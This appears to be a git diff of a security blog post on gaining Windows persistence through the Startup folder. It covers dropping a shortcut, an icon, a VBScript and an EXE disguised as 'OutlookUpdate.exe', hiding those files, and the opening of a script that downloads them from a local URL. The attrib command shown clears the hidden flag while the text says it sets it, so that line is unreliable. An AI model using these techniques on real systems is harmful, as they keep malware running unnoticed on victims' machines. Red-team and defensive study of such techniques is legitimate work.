ricardojoserf/ricardojoserf.github.io/_posts/2024-1-23-startupfolder.md

 ##### Hidden files

-Finally, we know we will have four files:
+Finally, now we know we will need four files:

 - The shortcut file in the Startup folder.
 - The icon file used by the shortcut file.
 - The VBScript file called by the shortcut.
 - The EXE file we wanted to execute in the system at startup.

-We will drop the icon and EXE file and generate the shortcut and VBScript file, and the four files will be on disk.
+We will drop the icon and EXE file and generate the shortcut and the VBScript file, and the four files will be on disk.

-We can use the "hidden" attribute so the files are not visible in the folder (by default, but you probably have File Explorer configured to see hidden items) or running "dir" (you should run "dir /a" to see these files).
-We could use:
+We can use the "hidden" attribute so the files are not visible in the folder (by default, even if you probably have File Explorer configured to see hidden items) or running "dir" (you should run "dir /a" to see these hidden files).
+For this we could use:

 ```
 attrib -h C:\ProgramData\Outlook\OutlookUpdate.exe
 ```

-It is important to notice that the shortcut file can not be "hidden", but the icon, VBScript and EXE files can.
+From my tests, it is important to notice that the shortcut file can not be "hidden", but the VBScript, EXE and even the icon file can be.

 <br>

 ## Final scripts

-This process is automated in the following script:
+This process is automated in the following [script](https://gist.github.com/ricardojoserf/d021310080ea34c8c6187d82065dde85):

 ```
 $Url = "http://127.0.0.1:8080"